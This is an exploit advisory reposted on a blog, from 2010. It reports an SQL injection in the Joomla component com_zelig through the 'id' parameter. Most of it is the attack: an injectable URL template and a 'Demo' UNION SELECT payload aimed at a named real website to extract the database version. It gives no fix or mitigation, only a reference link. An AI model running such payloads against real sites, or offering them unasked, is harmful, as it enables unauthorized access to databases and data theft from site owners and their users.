x] Joomla Component Zelig
[x] Date: 16/05/2010
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team: Fatal Error
[x] Bug: Sql Injection on Component Zelig (id)
[x] Example:
http://www.site.com/index.php?option=com_zelig&view=person&
id=[Sql Injection]
[x]
Demo:http://www.zeligfilm.it/index.php?option=com_zelig&view=person
&id=-1+UNION+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--
[x] Made in Brazil
References : http://securityreason.com/wlb_show/WLB-2010050094
0 comments:
Post a Comment
silahkan tinggalkan komentar anda disini .. :D